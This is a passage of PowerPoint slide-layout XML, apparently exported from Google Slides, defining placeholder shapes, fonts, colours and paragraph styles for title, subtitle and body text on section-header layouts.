              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Google Shape;176;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1426613" y="2465663"/>
            <a:ext cx="6457200" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2955938" y="3180563"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p17"/>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a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>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1_Section Header 1">
  <p:cSld name="11_Section Header_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="179" name="Shape 179"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-9131" y="0"/>
            <a:ext cx="9165900" cy="2526000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000D74"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451027" y="2771194"/>
            <a:ext cx="6408300" cy="2951700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1426613" y="686663"/>
            <a:ext cx="6457200" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
